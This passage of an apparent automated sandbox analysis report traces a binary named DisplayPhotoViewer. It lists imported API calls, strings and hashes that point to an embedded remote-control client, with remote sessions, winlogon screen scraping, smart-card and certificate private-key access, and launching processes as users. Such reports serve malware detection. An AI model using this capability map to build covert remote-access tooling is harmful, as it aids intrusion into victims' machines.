                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_bridgename), ref: 1105F32E
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_networks), ref: 1105F354
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_pingnet), ref: 1105F37A
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_open), ref: 1105F3A0
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_close), ref: 1105F3C6
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getsession), ref: 1105F412
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_call), ref: 1105F438
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_hangup), ref: 1105F45E
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_nsessions), ref: 1105F484
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_connected), ref: 1105F4AA
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_send), ref: 1105F4D0
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_sendex), ref: 1105F4F6
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_sendif), ref: 1105F50B
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_sendto), ref: 1105F531
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_subset), ref: 1105F53C
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_helpreq), ref: 1105F588
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_maxpacket), ref: 1105F5AE
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_openremote), ref: 1105F5D4
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_closeremote), ref: 1105F5FA
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_callremote), ref: 1105F620
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_pause), ref: 1105F562
                                                                                                      • Part of subcall function 11027F50: _strrchr.LIBCMT ref: 11028045
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028084
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_findslaves), ref: 1105F3EC
                                                                                                      • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
                                                                                                      • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
                                                                                                      • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
                                                                                                      • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_myaddr), ref: 1105F646
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_loadbridge), ref: 1105F651
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getfailedreason), ref: 1105F65C
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_escape), ref: 1105F667
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_publishservice), ref: 1105F672
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_publishserviceex), ref: 1105F67D
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_findslavesex), ref: 1105F68B
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_broadcastdata), ref: 1105F696
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_sendname), ref: 1105F6A4
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getlocalipaddressinuse), ref: 1105F6B2
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_clientpinrequest), ref: 1105F6C0
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_controlsendpin), ref: 1105F6CE
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_controlpinrequest), ref: 1105F6DC
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_clearpin), ref: 1105F6EA
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getcodepage), ref: 1105F6F8
                                                                                                    • GetProcAddress.KERNEL32(110706C0,ctl_getconnectivityinfo), ref: 1105F706
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ExitProcess$ErrorLastMessage_strrchrwsprintf
                                                                                                    • String ID: ..\ctl32\Connect.cpp$ctl_bridgename$ctl_broadcastdata$ctl_call$ctl_callremote$ctl_clearpin$ctl_clientpinrequest$ctl_close$ctl_closeremote$ctl_connected$ctl_controlpinrequest$ctl_controlsendpin$ctl_escape$ctl_findslaves$ctl_findslavesex$ctl_getcodepage$ctl_getconnectivityinfo$ctl_getfailedreason$ctl_getlocalipaddressinuse$ctl_getsession$ctl_hangup$ctl_helpreq$ctl_installed$ctl_loadbridge$ctl_maxpacket$ctl_myaddr$ctl_netname$ctl_networks$ctl_nsessions$ctl_open$ctl_openremote$ctl_pause$ctl_pingnet$ctl_publishservice$ctl_publishserviceex$ctl_remotename$ctl_send$ctl_sendex$ctl_sendif$ctl_sendname$ctl_sendto$ctl_subset$ctl_version
                                                                                                    • API String ID: 1096595926-1306570422
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Crypt32.dll,00000000,?,110A8165,218EC38C,?,?,?,?,11179CDB,000000FF,?,110ED4E1,00000000,00000000,?), ref: 110A73D0
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertCreateCertificateContext), ref: 110A73EC
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertFreeCertificateContext), ref: 110A73F9
                                                                                                    • GetProcAddress.KERNEL32(?,CertGetNameStringA), ref: 110A7406
                                                                                                    • GetProcAddress.KERNEL32(?,CertGetValidUsages), ref: 110A7413
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertOpenStore), ref: 110A7420
                                                                                                    • GetProcAddress.KERNEL32(?,CertOpenSystemStoreA), ref: 110A742D
                                                                                                    • GetProcAddress.KERNEL32(?,CertCloseStore), ref: 110A743A
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertAddCertificateContextToStore), ref: 110A7447
                                                                                                    • GetProcAddress.KERNEL32(?,CertAddEncodedCertificateToStore), ref: 110A7454
                                                                                                    • GetProcAddress.KERNEL32(?,CertSetCertificateContextProperty), ref: 110A7461
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertGetCertificateContextProperty), ref: 110A746E
                                                                                                    • GetProcAddress.KERNEL32(?,CryptAcquireCertificatePrivateKey), ref: 110A747B
                                                                                                    • GetProcAddress.KERNEL32(?,CertEnumCertificatesInStore), ref: 110A7488
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertGetEnhancedKeyUsage), ref: 110A7495
                                                                                                    • GetProcAddress.KERNEL32(?,CertGetCertificateChain), ref: 110A74A2
                                                                                                    • GetProcAddress.KERNEL32(?,CertVerifyCertificateChainPolicy), ref: 110A74AF
                                                                                                    • GetProcAddress.KERNEL32(00000000,CertFreeCertificateChain), ref: 110A74BC
                                                                                                    Strings
                                                                                                    • CertFreeCertificateContext, xrefs: 110A73F3
                                                                                                    • CertFreeCertificateChain, xrefs: 110A74B4
                                                                                                    • CertGetCertificateContextProperty, xrefs: 110A7468
                                                                                                    • CertGetValidUsages, xrefs: 110A740A
                                                                                                    • CertOpenSystemStoreA, xrefs: 110A7424
                                                                                                    • CertCloseStore, xrefs: 110A7431
                                                                                                    • CertOpenStore, xrefs: 110A741A
                                                                                                    • CertCreateCertificateContext, xrefs: 110A73E6
                                                                                                    • CertGetCertificateChain, xrefs: 110A7499
                                                                                                    • CertAddCertificateContextToStore, xrefs: 110A7441
                                                                                                    • CertGetEnhancedKeyUsage, xrefs: 110A748F
                                                                                                    • CertSetCertificateContextProperty, xrefs: 110A7458
                                                                                                    • CertVerifyCertificateChainPolicy, xrefs: 110A74A6
                                                                                                    • CertAddEncodedCertificateToStore, xrefs: 110A744B
                                                                                                    • Crypt32.dll, xrefs: 110A7396
                                                                                                    • CertGetNameStringA, xrefs: 110A73FD
                                                                                                    • CertEnumCertificatesInStore, xrefs: 110A747F
                                                                                                    • CryptAcquireCertificatePrivateKey, xrefs: 110A7472
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: CertAddCertificateContextToStore$CertAddEncodedCertificateToStore$CertCloseStore$CertCreateCertificateContext$CertEnumCertificatesInStore$CertFreeCertificateChain$CertFreeCertificateContext$CertGetCertificateChain$CertGetCertificateContextProperty$CertGetEnhancedKeyUsage$CertGetNameStringA$CertGetValidUsages$CertOpenStore$CertOpenSystemStoreA$CertSetCertificateContextProperty$CertVerifyCertificateChainPolicy$Crypt32.dll$CryptAcquireCertificatePrivateKey
                                                                                                    • API String ID: 2238633743-547962868
                                                                                                    APIs
                                                                                                    • GetLastError.KERNEL32(00000000,00000001,00000008,?,?,?,?,?), ref: 110FF926
                                                                                                    • GetLastError.KERNEL32(?,?,?), ref: 110FF93A
                                                                                                    • GetTickCount.KERNEL32 ref: 110FF968
                                                                                                    • SetThreadPriority.KERNEL32(00000000,00000001,110F6B40,00000001,00000000,00000000,00000001,00000008,?,?,?,?,?), ref: 110FF9EE
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 110FF9F5
                                                                                                    • InterlockedExchange.KERNEL32(00000000,00000000), ref: 110FFA07
                                                                                                    • WaitForSingleObject.KERNEL32(00000000,00001388,?,?,?), ref: 110FFA19
                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?), ref: 110FFA39
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000207,00000000,00000001,00000008,?,?,?,?,?), ref: 110FFA59
                                                                                                    • wsprintfA.USER32 ref: 110FFA85
                                                                                                    • SetTokenInformation.ADVAPI32(00000000,0000000C,?,00000004), ref: 110FFBD8
                                                                                                    • GetLastError.KERNEL32 ref: 110FFBE2
                                                                                                    • _memset.LIBCMT ref: 110FFC05
                                                                                                    • GetCurrentProcess.KERNEL32(?), ref: 110FFC28
                                                                                                    • GetPriorityClass.KERNEL32(00000000), ref: 110FFC2F
                                                                                                    • CloseHandle.KERNEL32(?), ref: 110FFC63
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110FFC84
                                                                                                    • GetTickCount.KERNEL32 ref: 110FFD12
                                                                                                    Strings
                                                                                                    • /TS , xrefs: 110FFB1D
                                                                                                    • Error. Null psi for session %d, xrefs: 110FF88D
                                                                                                    • CurrentSession %d appears invalid. Reset to -1, xrefs: 110FF95B
                                                                                                    • Error. terminating ui client, xrefs: 110FFA23
                                                                                                    • Exec %d-%s ret %d (h=%x), xrefs: 110FFCEE
                                                                                                    • D, xrefs: 110FFC14
                                                                                                    • " %s , xrefs: 110FFA7F
                                                                                                    • /VistaUI , xrefs: 110FFAAC
                                                                                                    • DisableConsoleClient, xrefs: 110FFAC8
                                                                                                    • clientname, xrefs: 110FFB45
                                                                                                    • Warning. Session %d disconnected - not launching client, xrefs: 110FF9AD
                                                                                                    • Restarting client after aborted logoff., xrefs: 110FF8D1
                                                                                                    • Warning. WTSQuerySessionInformation(%d) failed - not launching client, e=%d, xrefs: 110FF93E
                                                                                                    • Error. settok(%x, seshid %d) ret %d, e=%d, xrefs: 110FFBED
                                                                                                    • Error. ExecProcessAsUser ret %d, xrefs: 110FFC76
                                                                                                    • /S , xrefs: 110FFAF8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandle$ErrorLast$CountPriorityTick$ClassCurrentExchangeFileInformationInterlockedModuleNameObjectProcessSingleThreadTokenWait_memsetwsprintf
                                                                                                    • String ID: " %s $/S $/TS $/VistaUI $CurrentSession %d appears invalid. Reset to -1$D$DisableConsoleClient$Error. ExecProcessAsUser ret %d$Error. Null psi for session %d$Error. settok(%x, seshid %d) ret %d, e=%d$Error. terminating ui client$Exec %d-%s ret %d (h=%x)$Restarting client after aborted logoff.$Warning. Session %d disconnected - not launching client$Warning. WTSQuerySessionInformation(%d) failed - not launching client, e=%d$clientname
                                                                                                    • API String ID: 161374856-1113802814
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Winscard.dll,00000000,00000000,110A7883,00000000,00000001,00000000,?,11179C68,000000FF,?,110A82D2,?,?,00000200,?), ref: 110A7554
                                                                                                    • GetProcAddress.KERNEL32(00000000,SCardEstablishContext), ref: 110A7571
                                                                                                    • GetProcAddress.KERNEL32(?,SCardReleaseContext), ref: 110A757E
                                                                                                    • GetProcAddress.KERNEL32(?,SCardIsValidContext), ref: 110A758C
                                                                                                    • GetProcAddress.KERNEL32(?,SCardListReadersA), ref: 110A759A
                                                                                                    • GetProcAddress.KERNEL32(?,SCardGetStatusChangeA), ref: 110A75A8
                                                                                                    • GetProcAddress.KERNEL32(?,SCardCancel), ref: 110A75B6
                                                                                                    • GetProcAddress.KERNEL32(?,SCardFreeMemory), ref: 110A75C4
                                                                                                    • GetProcAddress.KERNEL32(?,SCardConnectA), ref: 110A75D2
                                                                                                    • GetProcAddress.KERNEL32(?,SCardDisconnect), ref: 110A75E0
                                                                                                    • GetProcAddress.KERNEL32(?,SCardGetAttrib), ref: 110A75EE
                                                                                                    • GetProcAddress.KERNEL32(?,SCardControl), ref: 110A75FC
                                                                                                    • GetProcAddress.KERNEL32(?,SCardListCardsA), ref: 110A760A
                                                                                                    • GetProcAddress.KERNEL32(?,SCardGetCardTypeProviderNameA), ref: 110A7618
                                                                                                    • GetProcAddress.KERNEL32(?,SCardBeginTransaction), ref: 110A7626
                                                                                                    • GetProcAddress.KERNEL32(?,SCardEndTransaction), ref: 110A7634
                                                                                                    • GetProcAddress.KERNEL32(?,SCardReconnect), ref: 110A7642
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID: SCardBeginTransaction$SCardCancel$SCardConnectA$SCardControl$SCardDisconnect$SCardEndTransaction$SCardEstablishContext$SCardFreeMemory$SCardGetAttrib$SCardGetCardTypeProviderNameA$SCardGetStatusChangeA$SCardIsValidContext$SCardListCardsA$SCardListReadersA$SCardReconnect$SCardReleaseContext$Winscard.dll
                                                                                                    • API String ID: 2238633743-561486686
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(Kernel32.dll,218EC38C,75BF3760,?,75BF7A80), ref: 1111FA07
                                                                                                    • GetCurrentProcess.KERNEL32 ref: 1111FA78
                                                                                                    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 1111FA8C
                                                                                                    • SetLastError.KERNEL32(00000078), ref: 1111FAA6
                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1111FACC
                                                                                                    • _memset.LIBCMT ref: 1111FB2A
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,04000000,00000000,00000000,?,?), ref: 1111FB6F
                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1111FB86
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 1111FBA0
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1111FBC4
                                                                                                    • CloseHandle.KERNEL32(?), ref: 1111FBCD
                                                                                                    • FreeLibrary.KERNEL32(?), ref: 1111FC1A
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseHandleLibrary$AddressCodeCreateCurrentErrorExitFileFreeLastLoadModuleNameObjectProcSingleWait_memset
                                                                                                    • String ID: "$CSmartcardDeviceMngr - PscrInstallDeviceW failed (%d)$CSmartcardDeviceMngr - failed to load pscrinst.dll (%d)$D$IsWow64Process$Kernel32.dll$PscrInstallDeviceW$Root\NS-PseudoSmartCardReader$\winst64.exe" /q /q /si$nspscr.inf$pscrinst.dll
                                                                                                    • API String ID: 3751713381-2378866903
                                                                                                    APIs
                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,Client32DIBQuit), ref: 110AD7C0
                                                                                                    • OpenEventA.KERNEL32(00100000,00000000,Client32DIBBlit), ref: 110AD7D1
                                                                                                    • OpenEventA.KERNEL32(00000002,00000000,Client32DIBDone), ref: 110AD7DF
                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,00000000,00000000,000000FA), ref: 110AD813
                                                                                                    • OpenFileMappingA.KERNEL32(000F001F,00000000,Client32DIB), ref: 110AD836
                                                                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000), ref: 110AD852
                                                                                                    • GetDC.USER32(00000000), ref: 110AD878
                                                                                                    • CreateCompatibleDC.GDI32(00000000), ref: 110AD88C
                                                                                                    • CreateDIBSection.GDI32(00000000,00000004,00000000,?,?,?), ref: 110AD8AF
                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 110AD8C6
                                                                                                    • GetTickCount.KERNEL32 ref: 110AD8CF
                                                                                                    • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 110AD906
                                                                                                    • GetTickCount.KERNEL32 ref: 110AD90F
                                                                                                    • GetLastError.KERNEL32(00000000), ref: 110AD91E
                                                                                                    • GdiFlush.GDI32 ref: 110AD932
                                                                                                    • SelectObject.GDI32(00000000,?), ref: 110AD93D
                                                                                                    • DeleteObject.GDI32(00000000), ref: 110AD944
                                                                                                    • SetEvent.KERNEL32(?), ref: 110AD94E
                                                                                                    • DeleteDC.GDI32(00000000), ref: 110AD958
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 110AD964
                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 110AD96E
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110AD975
                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 110AD999
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
                                                                                                    • Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    • Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: EventOpen$FileObject$CloseCountCreateDeleteHandleSelectTickView$CompatibleErrorFlushLastMappingMultipleObjectsReleaseSectionUnmapWait
                                                                                                    • String ID: Client32DIB$Client32DIBBlit$Client32DIBDone$Client32DIBQuit$ERROR %d blitting from winlogon, took %d ms$ScrapeApp
                                                                                                    • API String ID: 2071925733-2101319552
                                                                                                    • Opcode ID: 3aa07fff700c9852addd13dc1c0aa57167f38fc9f4b13a318c7a0e3636a6e2bf
                                                                                                    • Instruction ID: 8bf283354a7abfec1562c2065db5c14c4a1943bdcee64d7f1dfe756718e88c34
                                                                                                    • Opcode Fuzzy Hash: 3aa07fff700c9852addd13dc1c0aa57167f38fc9f4b13a318c7a0e3636a6e2bf
                                                                                                    • Instruction Fuzzy Hash: 6B518275E00625ABDB11DFE4DC89FAEFBB5EB48704F108029FD15A7284DB74A901CB61
APIs
• GetSysColor.USER32(00000004), ref: 1100378F
• InflateRect.USER32(?,000000FF,000000FF), ref: 110037AA
• GetSysColor.USER32(00000010), ref: 110037BD
• GetSysColor.USER32(00000010), ref: 110037D4
• GetSysColor.USER32(00000014), ref: 110037EB
• GetSysColor.USER32(00000014), ref: 11003802
• GetSysColor.USER32(00000014), ref: 11003825
• GetSysColor.USER32(00000014), ref: 1100383C
• GetSysColor.USER32(00000010), ref: 11003853
• GetSysColor.USER32(00000010), ref: 1100386A
• GetSysColor.USER32(00000004), ref: 11003881
• SetBkColor.GDI32(00000000,00000000), ref: 11003888
• InflateRect.USER32(?,000000FE,000000FD), ref: 11003896
• GetSysColor.USER32(00000010), ref: 110038B2
• CreatePen.GDI32(?,00000001,00000000), ref: 110038BB
• SelectObject.GDI32(00000000,00000000), ref: 110038C9
• MoveToEx.GDI32(00000000,?,?,00000000), ref: 110038E2
• LineTo.GDI32(00000000,?,?), ref: 110038F6
• SelectObject.GDI32(00000000,?), ref: 11003904
• DeleteObject.GDI32(?), ref: 1100390E
• GetSysColor.USER32(00000014), ref: 1100391C
• CreatePen.GDI32(?,00000001,00000000), ref: 11003925
• SelectObject.GDI32(00000000,00000000), ref: 11003932
• MoveToEx.GDI32(00000000,?,?,00000000), ref: 1100394E
• LineTo.GDI32(00000000,?,?), ref: 11003965
• SelectObject.GDI32(00000000,?), ref: 11003973
• DeleteObject.GDI32(00000000), ref: 1100397A
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: Color$Object$Select$CreateDeleteInflateLineMoveRect
• String ID: PB)uP])u
• API String ID: 1903512896-960617383
• Opcode ID: c31fb9aa66fae5aa6f35688eb30ae3fe90c84a43ca7e374bcfd5523f940971d5
• Instruction ID: 7a7b200571dfa9ab8619db7a921b542f9341b404ee07d42ca52b5a9c4e3b91b9
• Opcode Fuzzy Hash: c31fb9aa66fae5aa6f35688eb30ae3fe90c84a43ca7e374bcfd5523f940971d5
• Instruction Fuzzy Hash: 428162B5900709AFDB10DFA5CC85EBFF7B9EB88304F104A18FA11A7285D671A945CBA1
APIs
• LoadCursorA.USER32(00000000,00007F00), ref: 111334CA
• GetStockObject.GDI32(00000004), ref: 111334D5
• RegisterClassA.USER32(?), ref: 111334E9
• GetLastError.KERNEL32 ref: 1113355F
• GetLastError.KERNEL32 ref: 1113357B
• CreateWindowExA.USER32(00080020,NSMBlankWnd,Blank,88800000,?,?,?,?,00000000,00000000,00000000,00000000), ref: 111335E5
• SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000053), ref: 1113364E
• SetWindowPos.USER32(?,000000FF,00000000,00000000,00000000,00000000,00000053), ref: 1113367D
• UpdateWindow.USER32(?), ref: 111336AB
• GetProcAddress.KERNEL32(?,DwmEnableComposition), ref: 111336C6
• SetTimer.USER32(?,00000081,00000014,00000000), ref: 1113370A
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,110F078C), ref: 11133714
  • Part of subcall function 11027F50: GetLastError.KERNEL32(?,00000000,?), ref: 11027F6C
  • Part of subcall function 11027F50: wsprintfA.USER32 ref: 11027FB7
  • Part of subcall function 11027F50: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11027FF3
  • Part of subcall function 11027F50: ExitProcess.KERNEL32 ref: 11028009
• GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,110F078C), ref: 11133732
Strings
Memory Dump Source
• Source File: 00000006.00000002.3143050093.0000000011001000.00000020.00000001.01000000.00000016.sdmp, Offset: 11000000, based on PE: true
• Associated: 00000006.00000002.3143006244.0000000011000000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3145790708.0000000011188000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146380742.00000000111D5000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146505625.00000000111E4000.00000004.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111EA000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000111FE000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001124E000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.000000001127A000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112A6000.00000002.00000001.01000000.00000016.sdmp
• Associated: 00000006.00000002.3146553238.00000000112F2000.00000002.00000001.01000000.00000016.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_11000000_DisplayPhotoViewer.jbxd
Yara matches
Similarity
• API ID: ErrorLast$Window$AddressClassCreateCursorExitLoadMessageObjectProcProcessRegisterStockTimerUpdatewsprintf
• String ID: Blank$BlankHeight$BlankWidth$BlankWnd x%x created, w=%d, h=%d$DwmEnableComposition$Error setting blankwnd timer, e=%d$Error. BlankWnd not created, e=%d$Error. RegisterClass(%s) failed, e=%d$Info. Class %s already registered$NSMBlankWnd$_debug$e:\nsmsrc\nsm\1201\1201f2\ctl32\wndclass.h$m_hWnd
• API String ID: 1116282658-2568270441
• Opcode ID: 756e51f2203710efca58ada8dc261bebbab057ecdcf06e64cd36f069c7b24dc8
• Instruction ID: a1abf74e8625cae0b8c317ef1e47053b4359f05afce0f253b89d040129434249
• Opcode Fuzzy Hash: 756e51f2203710efca58ada8dc261bebbab057ecdcf06e64cd36f069c7b24dc8
• Instruction Fuzzy Hash: B58103B4A5070AAFD711DFA5DC81F9FF7A4AB88319F10842CE619A72C4D770A9008BA5
APIs
  • Part of subcall function 11059F80: __itow.LIBCMT ref: 11059FA5
• GetObjectA.GDI32(?,0000003C,?), ref: 110053E5
  • Part of subcall function 11107820: _malloc.LIBCMT ref: 11107829
  • Part of subcall function 11107820: _memset.LIBCMT ref: 11107852
• wsprintfA.USER32 ref: 1100543D
